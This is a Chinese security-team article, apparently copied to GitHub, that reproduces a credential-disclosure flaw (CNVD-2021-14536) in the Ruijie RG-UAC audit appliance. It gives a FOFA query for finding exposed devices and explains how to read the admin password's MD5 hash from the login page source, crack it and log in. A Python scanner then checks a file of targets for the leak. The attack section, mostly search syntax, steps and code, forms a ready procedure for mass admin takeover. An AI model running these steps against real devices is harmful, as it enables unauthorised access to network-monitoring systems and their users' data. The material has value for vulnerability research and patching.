Skip to content

Latest commit

 

History

History
156 lines (57 loc) · 4.88 KB

锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞 CNVD-2021-14536.md

File metadata and controls

156 lines (57 loc) · 4.88 KB

本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com

点击蓝字

图片

关注我们

_声明
_

本文作者:PeiQi
本文字数:1030

阅读时长:5~6分钟

附件/链接:点击查看原文下载

本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。

狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

前言

WgpSec·玄狼 漏洞复现招收师傅 

有意者简历投至 

**[email protected]
**

一、

漏洞描述

锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台

二、

漏洞影响

锐捷RG-UAC统一上网行为管理审计系统

三、

漏洞复现

使用FOFA语句包含关键字查找FOFA语句(仅供学习参考,请勿非法利用)

title="RG-UAC登录页面" && body="admin"

登录页面如下

图片

F12查看网页源码搜索关键字  admin

图片

使用 password值 md5解密

图片

使用admin作为用户名,破解的密码即可登录后台系统

图片

四、

漏洞利用POC

`import requests``import sys``import random``import re``from requests.packages.urllib3.exceptions import InsecureRequestWarning``def title():` `print('+------------------------------------------')` `print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')` `print('+  \033[34mVersion: 锐捷RG-UAC统一上网行为管理审计系统                             \033[0m')` `print('+  \033[36m使用格式:  python3 poc.py                                            \033[0m')` `print('+  \033[36mFile         >>> ip.txt                             \033[0m')` `print('+------------------------------------------')``def POC_1(target_url):` `vuln_url = target_url` `headers = {` `"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",` `}` `try:` `requests.packages.urllib3.disable_warnings(InsecureRequestWarning)` `response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)` `if "super_admin" in response.text and "password" in response.text and response.status_code == 200:` `print("\033[32m[o] 目标 {}存在漏洞 ,F12查看源码获取密码md5值 \033[0m".format(target_url))` `else:` `print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url))` `except Exception as e:` `print("\033[31m[x] 目标 {}不存在漏洞 \033[0m".format(target_url))``def Scan(file_name):` `with open(file_name, "r", encoding='utf8') as scan_url:` `for url in scan_url:` `if url[:4] != "http":` `url = "http://" + url` `url = url.strip('\n')` `try:` `POC_1(url)` `except Exception as e:` `print("\033[31m[x] 请求报错 \033[0m".format(e))` `continue``if __name__ == '__main__':` `title()` `file_name  = str(input("\033[35mPlease input Attack File\nFile >>> \033[0m"))` `Scan(file_name)`

图片

作者

图片

PeiQi

   感谢观看啦~

扫描关注公众号回复加群

和师傅们一起讨论研究~

WgpSec狼组安全团队

微信号:wgpsec

Twitter:@wgpsec

图片

图片